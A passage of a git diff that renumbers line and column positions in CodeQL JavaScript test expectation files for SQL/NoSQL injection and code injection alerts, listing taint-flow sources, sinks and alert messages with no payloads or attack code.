This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:87:51:87:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:87:51:87:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:89:46:89:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:89:46:89:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:92:46:92:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:92:46:92:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:94:51:94:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:94:51:94:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:96:46:96:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:96:46:96:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:111:14:111:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:111:14:111:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:113:31:113:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:113:31:113:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:116:22:116:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:116:22:116:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:117:21:117:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:117:21:117:24 | cond | This query object depends on a $@. 
| mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:118:21:118:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:118:21:118:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:119:18:119:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:119:18:119:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:120:22:120:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:120:22:120:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:121:16:121:19 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:121:16:121:19 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:122:19:122:22 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:122:19:122:22 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:123:20:123:21 | id | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:123:20:123:21 | id | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:124:28:124:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:124:28:124:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:125:28:125:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:125:28:125:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:126:28:126:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:126:28:126:31 | cond | This query object depends on a $@. 
| mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:127:18:127:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:127:18:127:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:128:22:128:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:128:22:128:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:129:21:129:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:129:21:129:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:130:16:130:26 | { _id: id } | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:130:16:130:26 | { _id: id } | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:136:30:136:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:136:30:136:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongooseJsonParse.js:23:19:23:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:23:19:23:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | +| mongoose.js:97:14:97:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:97:14:97:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:99:31:99:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:99:31:99:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:102:22:102:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:102:22:102:25 | cond | This query object depends on a $@. 
| mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:103:21:103:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:103:21:103:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:104:21:104:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:104:21:104:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:105:18:105:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:105:18:105:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:106:22:106:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:106:22:106:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:107:16:107:19 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:107:16:107:19 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:108:19:108:22 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:108:19:108:22 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:109:20:109:21 | id | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:109:20:109:21 | id | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:110:28:110:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:110:28:110:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:111:28:111:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:111:28:111:31 | cond | This query object depends on a $@. 
| mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:112:28:112:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:112:28:112:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:113:18:113:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:113:18:113:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:114:22:114:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:114:22:114:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:115:21:115:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:115:21:115:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:116:16:116:26 | { _id: id } | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:116:16:116:26 | { _id: id } | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:122:30:122:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:122:30:122:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongooseJsonParse.js:22:19:22:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:22:19:22:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | | mongooseModelClient.js:11:16:11:24 | { id: v } | mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:11:16:11:24 | { id: v } | This query object depends on a $@. 
| mongooseModelClient.js:10:22:10:29 | req.body | user-provided value | | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | This query object depends on a $@. | mongooseModelClient.js:12:22:12:29 | req.body | user-provided value | | mysql.js:15:18:15:65 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:15:18:15:65 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | 
@@ -751,7 +751,7 @@ subpaths | redis.js:43:27:43:29 | key | redis.js:38:17:38:24 | req.body | redis.js:43:27:43:29 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | | redis.js:46:34:46:36 | key | redis.js:38:17:38:24 | req.body | redis.js:46:34:46:36 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | | socketio.js:11:12:11:53 | `INSERT ... andle}` | socketio.js:10:25:10:30 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | This query string depends on a $@. | socketio.js:10:25:10:30 | handle | user-provided value | -| tst2.js:9:27:9:84 | "select ... d + "'" | tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:9:66:9:78 | req.params.id | user-provided value | +| tst2.js:8:27:8:84 | "select ... d + "'" | tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:8:66:8:78 | req.params.id | user-provided value | | tst3.js:9:14:9:19 | query1 | tst3.js:8:16:8:34 | req.params.category | tst3.js:9:14:9:19 | query1 | This query string depends on a $@. | tst3.js:8:16:8:34 | req.params.category | user-provided value | | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | This query string depends on a $@. | tst4.js:8:46:8:60 | $routeParams.id | user-provided value | | tst.js:10:10:10:64 | 'SELECT ... d + '"' | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | This query string depends on a $@. | tst.js:10:46:10:58 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected index e536c54dbd2f..59a5381f2cd2 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected 
@@ -2,14 +2,14 @@ edges | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | provenance | | | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... 
+ "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | 
@@ -28,17 +28,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... 
ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | 
@@ -61,24 +61,24 @@ nodes | angularjs.js:47:16:47:30 | location.search | semmle.label | location.search | | angularjs.js:50:22:50:36 | location.search | semmle.label | location.search | | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... 
+ "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | 
@@ -102,25 +102,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | 
@@ -147,16 +147,16 @@ subpaths | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | This code execution depends on a $@. | angularjs.js:47:16:47:30 | location.search | user-provided value | | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | This code execution depends on a $@. | angularjs.js:50:22:50:36 | location.search | user-provided value | | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | This code execution depends on a $@. | angularjs.js:53:32:53:46 | location.search | user-provided value | -| express.js:7:24:7:69 | "return ... + "];" | express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | This code execution depends on a $@. | express.js:7:44:7:62 | req.param("wobble") | user-provided value | -| express.js:9:34:9:79 | "return ... + "];" | express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | This code execution depends on a $@. | express.js:9:54:9:72 | req.param("wobble") | user-provided value | -| express.js:12:8:12:53 | "return ... + "];" | express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | This code execution depends on a $@. | express.js:12:28:12:46 | req.param("wobble") | user-provided value | -| express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | This code execution depends on a $@. | express.js:15:22:15:54 | req.par ... ction") | user-provided value | -| express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | This code execution depends on a $@. | express.js:17:30:17:53 | req.par ... 
cript") | user-provided value | -| express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | This code execution depends on a $@. | express.js:19:37:19:70 | req.par ... odule") | user-provided value | -| express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:21:19:21:48 | req.par ... ntext") | user-provided value | -| express.js:27:34:27:38 | taint | express.js:26:17:26:35 | req.param("wobble") | express.js:27:34:27:38 | taint | This code execution depends on a $@. | express.js:26:17:26:35 | req.param("wobble") | user-provided value | -| express.js:43:15:43:19 | taint | express.js:34:17:34:35 | req.param("wobble") | express.js:43:15:43:19 | taint | This code execution depends on a $@. | express.js:34:17:34:35 | req.param("wobble") | user-provided value | -| express.js:50:10:50:12 | msg | express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | This code execution depends on a $@. | express.js:49:30:49:32 | msg | user-provided value | +| express.js:6:24:6:69 | "return ... + "];" | express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | This code execution depends on a $@. | express.js:6:44:6:62 | req.param("wobble") | user-provided value | +| express.js:7:34:7:79 | "return ... + "];" | express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | This code execution depends on a $@. | express.js:7:54:7:72 | req.param("wobble") | user-provided value | +| express.js:9:8:9:53 | "return ... + "];" | express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | This code execution depends on a $@. | express.js:9:28:9:46 | req.param("wobble") | user-provided value | +| express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... 
ction") | express.js:11:22:11:54 | req.par ... ction") | This code execution depends on a $@. | express.js:11:22:11:54 | req.par ... ction") | user-provided value | +| express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | This code execution depends on a $@. | express.js:12:30:12:53 | req.par ... cript") | user-provided value | +| express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | This code execution depends on a $@. | express.js:13:37:13:70 | req.par ... odule") | user-provided value | +| express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:14:19:14:48 | req.par ... ntext") | user-provided value | +| express.js:20:34:20:38 | taint | express.js:19:17:19:35 | req.param("wobble") | express.js:20:34:20:38 | taint | This code execution depends on a $@. | express.js:19:17:19:35 | req.param("wobble") | user-provided value | +| express.js:36:15:36:19 | taint | express.js:27:17:27:35 | req.param("wobble") | express.js:36:15:36:19 | taint | This code execution depends on a $@. | express.js:27:17:27:35 | req.param("wobble") | user-provided value | +| express.js:43:10:43:12 | msg | express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | This code execution depends on a $@. | express.js:42:30:42:32 | msg | user-provided value | | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value | | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. 
| module.js:11:17:11:30 | req.query.code | user-provided value | | react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | 
@@ -176,17 +176,17 @@ subpaths | template-sinks.js:31:19:31:25 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:31:19:31:25 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | | template-sinks.js:32:16:32:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:32:16:32:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | | template-sinks.js:33:17:33:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:33:17:33:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| tst.js:2:6:2:83 | documen ... t=")+8) | tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:2:6:2:27 | documen ... on.href | user-provided value | -| tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:5:12:5:33 | documen ... on.hash | user-provided value | -| tst.js:14:10:14:74 | documen ... , "$1") | tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:14:10:14:33 | documen ... .search | user-provided value | -| tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:17:21:17:42 | documen ... on.hash | user-provided value | -| tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:20:30:20:51 | documen ... on.hash | user-provided value | -| tst.js:23:6:23:46 | atob(do ... 
